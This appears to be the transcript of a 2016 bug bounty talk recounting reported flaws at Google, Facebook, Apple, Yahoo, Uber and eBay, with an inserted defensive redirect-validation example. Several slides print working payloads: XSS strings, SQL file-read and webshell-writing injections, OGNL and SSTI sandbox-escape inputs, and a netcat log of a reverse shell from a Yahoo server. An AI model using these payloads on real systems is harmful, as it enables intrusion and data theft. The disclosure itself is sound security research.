
Tales of a Bug Bounty Hunter - The Vulnerabilities I Reported Over the Years

Orange
July 22, 2016


A bug bounty hunter's notes on taking part in the major vendors' Bug Bounty programs and hunting for vulnerabilities, together with the details of the reports and bugs that were accepted or rejected!

The vendors include Google, Facebook, Apple, Yahoo, Uber and eBay; the vulnerabilities range from Remote Code Execution, SQL Injection and Logical Flaws to XSS found through unusual techniques.

Let's take a look at what kinds of vulnerabilities big companies have!

Transcript

  1. Bug bounty results
    $6 Million • 750+ bugs in 2015 • 300+ hackers in 2015
    $4.2 Million • 526 bugs in 2015 • 210 hackers in 2015
    $1.6 Million • 2500+ bugs since 2013 • 1800+ hackers since 2013
  2. Understanding the common vulnerability classes
    SQL Injection, Cross-Site Scripting, Cross-Site Request Forgery, XML External Entity, Local File Inclusion, CSV Macro Injection, XSLT Injection, SVG/XML XSS, RPO Gadget (NOT ROP), Subdomain Takeover
  3. Information gathering methods
    • DNS and the network perimeter: subdomains? adjacent domains? internal domains? Whois? R-Whois? Acquired services and Google's six-month rule
    • Port scanning: Facebook Jenkins RCE by Dewhurst Security; Pornhub Memcached Unauthenticated Access by @ZephrFish; uberinternal.com? twttr.com? etonreve.com?
  4. Bonus for doing your homework - Facebook Onavo DOM-based XSS
    • Mar 16, 2014: Onavo Reflected XSS by Mazin Ahmed
    • May 01, 2014: Facebook fixed it
    • One day, Facebook revised it... Buggy again!
      http://cf.onavo.com/iphone/mc/deactivate.html?url=javascript:alert(document.domain)&seed=1394953248
  5. Bonus for doing your homework - Facebook Onavo DOM-based XSS
    function mc() {
        if ((UACheck == "0") || (navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPad/i)) || (navigator.userAgent.match(/iPod/i))) {
            document.location.href = MC;
            setTimeout(postmc, 3000);
        } else {
            alert('Not an iPhone/iPad...');
        ...
    var seed = getQueryVariable("seed");
    var url = getQueryVariable("url");
    var UACheck = getQueryVariable("uacheck");
    var MC = getQueryVariable("mc");
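As an added example (not code from the deck or from Onavo), the redirect sink on slide 5 beside a hardened version: the page copies `mc`/`url` from the query string straight into `document.location.href`, so a `javascript:` value runs in the page's origin, whereas the hardened function parses the value as a URL and accepts only http(s) targets on an allow-listed host. The page origin and the allow-listed host names are assumptions.

```javascript
// Added example, not the Onavo page's code. Host names and origin below are
// constructed assumptions standing in for whatever the real page would allow.
const PAGE_ORIGIN = "http://cf.onavo.com";
const ALLOWED_HOSTS = new Set(["cf.onavo.com", "www.onavo.com"]);

// Vulnerable pattern from the slide: the query-string value is used as-is,
// so "javascript:..." (or an off-site URL) ends up in document.location.href.
function unsafeRedirectTarget(queryString) {
  const params = new URLSearchParams(queryString);
  return params.get("mc") || params.get("url");
}

// Hardened version: resolve the value relative to the page, then require an
// http(s) scheme and an allow-listed host; anything else gets the fallback.
function safeRedirectTarget(queryString, fallback = "/") {
  const params = new URLSearchParams(queryString);
  const raw = params.get("mc") || params.get("url");
  if (!raw) return fallback;
  let target;
  try {
    target = new URL(raw, PAGE_ORIGIN); // also normalizes "//host/path" forms
  } catch (e) {
    return fallback; // unparseable input never reaches location.href
  }
  if (target.protocol !== "http:" && target.protocol !== "https:") return fallback;
  if (!ALLOWED_HOSTS.has(target.hostname)) return fallback;
  return target.href;
}

// Browser-side use (the deck's page would do this instead of assigning MC):
//   document.location.href = safeRedirectTarget(window.location.search);
```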
  6. Bonus for doing your homework - eBay SQL Injection
    • While enumerating eBay.com, one host reverse-resolved to eBayc3.com
    • WHOIS confirmed it is indeed owned by eBay Inc.
    • Enumerating eBayc3.com turned up images.ebayc3.com
  7. Bonus for doing your homework - eBay SQL Injection
    • A SQL Injection so simple even a cat could do it; can it be turned into RCE?
    • Try reading files?
      CREATE TABLE test (src TEXT);
      LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE `test`;
  9. Speed is everything
    • Fingerprinting; collect and organize: Web application? Framework?
    • Keep good notes day to day, and when a 1-day drops, race for first blood
      WordPress CVE-2016-4567 flashmediaelement.swf XSS
      ImageTragick Remote Code Execution
  10. Speed is everything - the developer.apple.com breach
    2013 07/18: iOS Developer - "We'll be back soon"
    2013 07/22: Apple confirms its developer website was hacked
    2013 07/22: Ibrahim Balic: I hacked Apple's developer website and have over 100K developers' user details
    2013 07/??: Apple Hall of Fame - "We would like to acknowledge 7dscan.com, and SCANV of knownsec.com for reporting this issue"
  13. Speed is everything - Yahoo Login Site RCE
    • Got drawn in by the Yahoo Bug Bounty controversy; it looked like fun
    • Still plain Google hacking: site:yahoo.com ext:action
      b.login.yahoo.com
      s2-016 appeared to work, but there appeared to be a WAF
      A three-month window! Got the hang of OGNL on the first try!
  14. Speed is everything - Yahoo Login Site RCE
    • Bypassing the WAF: how to tell which keywords are filtered?
      redirect:${12*21}                              # /login/252
      redirect:${#c=1}                               # /login/
      redirect:${#c=1,1}                             # /login/1
      redirect:${#c=1,#d=new chra[10]}               # /login/
      redirect:${#c=1,#d=new chra[10],1}             # /login/
  15. Speed is everything - Yahoo Login Site RCE
    orange@z:~$ nc -vvl 12345
    Connection from 209.73.163.226 port 12345 [tcp/italk] accepted
    Linux ac4-laptui-006.adx.ac4.yahoo.com 2.6.18-308.8.2.el5.YAHOO.20120614 #1 SMP Thu Jun 14 13:27:27 PDT 2012 x86_64 x86_64 x86_64 GNU/Linux
    orange@z:~$
  17. Resigned to the grind QQ - www.google.com XSS
    • Using Google hacking to hack Google: site:www.google.com -adwords -finance...
      www.google.com/trends/correlate/js/correlate.js
      goog$exportSymbol("showEdit", function(src_url) {
          ...
          var html = (new goog$html$SafeHtml).initSecurityPrivateDoNotAccessOrElse_(
              '<iframe width=400 height=420 marginheight=0 marginwidth=0 frameborder=0 src="' + src_url + '">Loading...</iframe>');
          ...
      }
  18. Resigned to the grind QQ - www.google.com XSS
    • How to control it?
      id:PaHT-seSlg9         200 OK
      id:not_exists          500 Error
      id:PaHT-seSlg9:foobar  200 OK
      www.google.com/trends/correlate/search?e=id:PaHT-seSlg9&t=weekly
      <a href="#" onclick="showEdit('/trends/correlate/edit?e=id:PaHTseSlg9&t=weekly');">
  19. Resigned to the grind QQ - www.google.com XSS
    • Looks filtered? But don't forget it sits inside JavaScript: HTML entities? Hex escapes? Octal escapes?
      www.google.com/trends/correlate/search?e=id:PaHT-seSlg9:'"><&t=weekly
      <a href="#" onclick="showEdit('/trends/correlate/edit?e=id:PaHTseSlg9:&#39;&quot;&gt;&lt;&t=weekly');">
  20. Resigned to the grind QQ - www.google.com XSS
    • Looks like a DOM-based SELF-XSS that needs user interaction? A 50/50 chance of being accepted; a more convincing scenario is needed to persuade Google
    • Keep digging! Combine it with clickjacking? Put the element that must be clicked inside an IFRAME positioned under the mouse pointer so it follows the cursor
  21. Resigned to the grind QQ - Facebook Remote Code Execution
    • Reverse Whois on facebook.com returns thefacebook.com, tfbnw.net, fb.com
    • Enumerating the vpn.tfbnw.net range: vpn.tfbnw.net, files.fb.com, www.facebooksuppliers.com
  22. Resigned to the grind QQ - Facebook Remote Code Execution
    • Getting a shell: OR 1=1 LIMIT 1 INTO OUTFILE '...' LINES TERMINATED BY 0x3c3f... #
    • Getting root: what happens when a new feature has to ship? Give the user an "update" button. Nobody wants to reinvent the wheel, so which existing update mechanism is used? Yum install. Yum install lacks privileges? Add it to sudoers. Running it from the web page prompts for a password? Add NOPASSWD
  23. Horizontal privilege and logic issues - Apple XSS
    • lookup-api.apple.com/wikipedia.org     # ok
    • lookup-api.apple.com/orange.tw         # failed
    • lookup-api.apple.com/en.wikipedia.org  # ok
    • lookup-api.apple.com/ja.Wikipedia.org  # ok
  24. Rare techniques and clever ideas - Apple RCE, first time inside Apple's internal network
    • In 2012 hardly anyone knew about the Struts2 vulnerabilities
    • Google Trend of Struts2
  25. Rare techniques and clever ideas - how a certain big vendor's XSS 0-day was found
    • While scanning vendor OO's scope I found an IP; how to tell whether the IP belongs to vendor OO? Check the certificate
    • Once in, it turned out to be an OO system built by a big foreign vendor, written in Struts2, fully updated, no more s2-0xx
  26. Rare techniques and clever ideas - how a certain big vendor's XSS 0-day was found
    • Idea: every Struts2 action extends ActionSupport, so to tell whether a site is written in Struts2 just append ?actionErrors=1 to the URL
      /whatever.action?actionErrors=<svg/onload=alert(1)>
      public void setActionErrors(Collection<String> errorMessages) {
          validationAware.setActionErrors(errorMessages);
      }
  28. Rare techniques and clever ideas - Uber SSTI RCE
    • Template-related attacks have been hot in recent years but get less attention: Client Side Template Injection, Server Side Template Injection
    • Uber's own engineering blog describes product technical details, mainly NodeJS and Flask, which saved the time spent on fingerprinting
  29. Rare techniques and clever ideas - Uber SSTI RCE
    • Python Sandbox Bypass
      {{ [].__class__.__base__.__subclasses__() }}
      Hi, [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, ..., <class 'upi.sqlalchemy.UberAPIModel'>, ... ..., <class 'celery.worker.job.Request'>, ... ]
    • Asynchronous Task
      Template( "Hi, %s ..." % get_name_from_db() )
  31. Reading resources
    Google Bughunter University, Bugcrowd List Of Bug Bounty Programs, Hackerone Hacktivity, Xsses.com, Facebook Bug Bounties by @phwd, Wooyun.org